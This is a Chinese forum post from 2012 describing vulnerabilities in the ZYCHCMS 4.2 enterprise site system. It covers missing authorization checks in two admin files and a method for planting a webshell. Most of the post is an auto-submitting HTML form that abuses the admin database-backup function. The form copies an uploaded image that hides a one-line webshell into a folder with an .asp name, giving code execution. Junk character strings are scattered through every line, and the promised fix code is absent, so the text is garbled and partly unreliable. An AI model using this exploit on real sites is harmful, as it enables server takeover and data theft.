) S- N" F+ A T
( N5 F+ Y3 i; p9 S) m; H$ P: D7 F# h
A8 J$ W+ ~- [! Z- ~% j, d- h& E
) k3 ] H3 l$ H& r影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)! {. Q m# p3 B. t: [& r/ z, B# g
①SQL注射漏洞# C6 y( B9 v! T3 Z
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp. N: ^$ }, [4 t% p
漏洞原因:未过滤0 s8 x3 B# M3 z l2 L
漏洞代码:
) F: z6 `; {% R" J 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。0 u! }0 B1 n3 Q6 l2 V( M A
修复方法:在文件开头加入代码$ W2 a/ ?2 H2 \6 @; a$ U
1 C* ]0 H! [2 H& d, \- q) X& d3 K: O" k0 d6 M- d
②后台拿WBSHELL
- I" U) [0 ` ~7 f7 ~& K$ t2 ^- e 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
+ \& o0 O( `, m4 }' [3 B9 Y 这里在网上找了一个,改了下,将就着用。+ d9 g- Y, a# Z# K+ k8 w# f& @& A6 w
以下是代码本地提交代码- o( L/ o4 |& N- I% v
$ p* r# p* K1 b+ z1 f2 E
* U3 f, M( v" {; }" `<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
]! k( s2 h2 ~1 J <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
% p$ i. T0 m2 N* E <tr>
! ~" U% R2 R5 X& X& T+ p# l <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>0 y8 C* l6 B) j& y0 v- a9 P
</tr>
0 O3 ` Z) d2 g9 B, d2 { <tr>
w% Z) `; }4 j) F <td bgcolor=”#FFFFFF”><span class=”back_southidc”>' g! q! E7 Z& m: l& S \
</span>7 d% X% a8 d3 s' g; [
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >6 O# u$ ^) j: W C4 L$ @3 A6 A5 b
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >6 f8 d7 @+ |8 A
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
4 Z& {/ ]; I$ P <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d3 s* t1 Z' o5 v: @ L
<div align=”left”> s0 T+ B# ^8 I: I9 x1 b R
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />( n. G) I9 E- I
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>" i% t. t+ H1 ?% V6 x$ V) D
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
; A5 y; p: p% Q, z </div></td>
, l) {) h: [! K B: g* _ </tr>4 \! q+ ~3 ?" _; J* ?' v
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
5 j, @. G" T3 j. ~9 @ <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
~6 g3 |5 V( A! S* n. m <td class=”td”><div align=”left”>
9 s& T5 u1 E+ \- c; k <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
+ D# S. S( P+ Z5 @ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
) v8 J1 L& T6 L7 [, b& Y </tr>
e* l. X. Z( ` <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>/ @& r$ Z) s$ g; y# G
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>$ t. W/ F, H* i+ Y) a2 l
<td class=”td”><div align=”left”>+ [& K" p. ?) u. B
<input type=”submit” value=”确定备份” class=”btn”
! {, V& K4 i/ S </div></td>9 ^! M3 t8 ]0 u5 t8 F- G2 m
</tr>
5 g+ k9 X, P/ ?8 H- M </table></td></tr></form>
6 J# Y: E7 o3 S6 ?% [% \ \ </table>
\. G# N, H" H/ q </td>
i; }2 a9 v8 f4 u </tr>1 N& b$ n" K0 k" b
</table>
5 e! D' q. X2 W <script>5 }# L i+ X0 |: r$ c4 M
document.all.add.submit();
& r2 r9 A/ E2 z& _ </script>
0 n7 _* x% f* t* w7 n. e 3 U9 C6 O" k5 a+ j
- R0 j- L; _; W$ {
d9 ]6 B% e; G1 a! j
0 j1 C2 ?4 P+ Z8 t* i1 f" X
! O8 K* G1 V; f n B& B# L- o l x5 q$ x: G
! q' ], Y, _! s9 F
5 p( O; |4 U" d5 @% x }7 i' J
' ~ a7 @: X2 X# S* k
0 I, h& S9 t+ ~* h0 k |
发表于 2012-9-10 21:09:51
收藏
分享
支持
反对